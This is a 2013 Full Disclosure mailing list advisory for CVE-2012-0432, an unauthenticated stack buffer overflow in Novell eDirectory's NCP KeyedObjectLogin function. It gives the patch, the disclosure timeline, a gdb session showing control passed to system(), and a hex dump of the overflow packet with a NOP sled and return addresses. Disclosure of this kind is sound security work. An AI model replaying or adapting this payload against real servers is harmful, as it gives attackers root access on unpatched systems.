Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Novell NCP Pre-Auth Remote Stack-Based Buffer Overflow. (CVE-2012-0432)
From: David Klein <david.r.klein () gmail com>
Date: Tue, 15 Jan 2013 13:52:24 +1100

=====================================================================
Title:        Novell NCP Pre-Auth Remote Stack-Based Buffer Overflow.
Author:       David Klein (david.r.klein at 676D61696).

Product:      Novell NCP in eDirectory.
Platform:     Linux RCE, Windows (GS), Sol & AIX likely vuln.
CVES:         CVE-2012-0432
=====================================================================

1. Summary:

Stack Buffer Overflow in vulnerable (network) function.
The vulnerable function is KeyedObjectLogin (http://bit.ly/W5IeHO).

Bug is trivially exploitable on Linux due to lack of stack cookie,
the vulnerable process runs as root by default, giving an attacker
full control over the process in the context of uid0.

Vulnerability is remotely exploitable, authentication not required.

2. Description (wiki):

http://en.wikipedia.org/wiki/Novell_eDirectory

3. Solution:

Install vendor patch. 'eDirectory 8.8 SP7 patch 2 6989'
Download: http://download.novell.com/Download?buildid=ifVmcyYyHI8

4. Timeline:
   08102012 - discovery
   12102012 - PGP key link on vendors site 404's.
   12102012 - requested secure contact from vendor.
   06102012 - emailed SuSE sec asking if they have a contact.
   18102012 - contacted NetIQ Tech Services.
   26102012 - bug logged internally with Novell (785272)
   06112012 - vendor contact, bug will be fixed in 88SP7 patch 2.
   13122012 - patch released, only available to paying customers.
   15012013 - public full disclosure.

5. Thank you:
   Kevin Pidd of NetIQ (Novell?) for prompt responses,
   andrewG for assistance especially with gdb & Linux.
   emp for industry contacts

6. Demo (system(), exit(), source and pcaps available on request)

   (gdb) break system
   Breakpoint 1 at 0x1607d4
   (gdb) continue
   Continuing.
   [New Thread 0x44deb70 (LWP 8944)]
   [Switching to Thread 0x25eab70 (LWP 8897)]

   Breakpoint 1, 0x001607d4 in system () from /lib/libpthread.so.0

   (gdb) x/4x $esp
   0x1e8bba8: 0x90909090 0x90909090 0x08052d9c 0x00000000
   (gdb) x/4x $ebp
   0x1e8bbac: 0x90909090 0x08052d9c 0x00000000 0x90909090
   (gdb) x/1i $eip
   => 0x1607d4 <system+4>: call   0x1565e0 <__i686.get_pc_thunk.bx>
   (gdb) i r
   eax            0xf0        240
   ecx            0x8364034    137773108
   edx            0x0        0
   ebx            0x90909090 -1869574000
   esp            0x1e8bba8    0x1e8bba8
   ebp            0x1e8bbac    0x1e8bbac
   esi            0x14e4bef4 350535412
   edi            0xf        15
   eip            0x1607d4    0x1607d4 <system+4>
   ...

   (gdb) continue
   Continuing.
   Detaching after fork from child process.
   ...
   [Thread 0x25eab70 (LWP 8897) exited]
   Program exited with code 0220.

7. Payload on the wire:

   ->
   00000000  44 6d 64 54 00 00 00 17  00 00 00 01 00 00 00 00
   00000010  11 11 00 00 00 00 00

   <-
   00000000  74 4e 63 50 00 00 00 10  33 33 00 10 00 00 00 00

   ->
   00000017  44 6d 64 54 00 00 01 0c  00 00 00 01 00 00 00 05
   00000027  22 22 01 10 00 00 17 00  a7 18 90 90 90 90 90 90
   00000037  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90
   00000047  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90
   00000057  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90
   00000067  90 90 90 90 90 90 90 90  90 90 90 90 90 90 8c 26
   00000077  05 08 9c 2d 05 08 00 00  00 00 90 90 90 90 00 01
   00000087  9b 48 48 48 48 48 48 48  48 48 48 48 48 48 48 48
   00000097  48 48 48 48 48 48 48 48  48 48 48 48 48 48 48 48
   000000A7  48 48 48 48 48 48 48 48  48 48 48 48 48 48 48 48
   000000B7  48 48 48 48 48 48 48 48  48 48 48 48 48 48 48 48
   000000C7  48 48 48 48 48 48 48 48  48 48 48 48 48 48 48 48
   000000D7  48 48 48 48 48 48 48 48  48 48 48 48 48 48 48 48
   000000E7  48 48 48 48 48 48 48 48  48 48 48 48 48 48 48 48
   000000F7  48 48 48 48 48 48 48 48  48 48 48 48 48 48 48 48
   00000107  48 48 48 48 48 48 48 48  48 48 48 48 48 48 48 48
   00000117  48 48 48 48 48 48 48 48  48 48 48 48
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • Novell NCP Pre-Auth Remote Stack-Based Buffer Overflow. (CVE-2012-0432) David Klein (Jan 15)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault